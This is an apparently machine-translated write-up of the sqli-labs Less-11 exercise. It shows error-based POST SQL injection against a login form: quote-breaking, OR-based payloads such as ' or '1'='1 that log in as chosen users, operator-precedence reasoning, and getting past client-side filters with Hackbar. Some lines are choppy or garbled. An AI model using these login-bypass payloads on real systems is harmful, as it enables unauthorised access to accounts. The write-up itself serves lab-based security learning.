View source code, user name and password submitted via post
Add single quotation marks to submit
An error occurred, presumably the corresponding SQL statement
Select from where xxx=' and yyy=' 123 '0,1
Construct a permanent login directly using or
Successful, note that the user logged in here is the first user in the table
Need to change the user can be implemented by changing the filter criteria
Log on as a second user in the table
If the input qualification of sensitive characters is made at the client, you can submit the post data bypass directly using Hackbar
If this input is constructed, the login will fail because the and priority is higher than or.
yyy= ' test ' returns false and the and operation is still false, xxx= ' 1 ' or false result is false
Which means the query doesn't return any results.
Select ... where xxx= '1 ' or ' 1 ' = ' 1' and yyy= 'test' limit 0,1
Note that if yyy= ' test ' returns TRUE, this query is able to get the result of a successful login
For example, a user password in the table is admin
This is the one that can be successfully logged in as the user
Use this idea to construct the following injection
Can successfully bypass
Select ... where xxx= '1 ' or ' 1 ' = ' 1 ' or ' 1 ' = ' 1' and yyy= 'test' limit 0,1
"Sqli-labs" Less11 post-error based-single quotes-string (Error-based POST single quote character injection)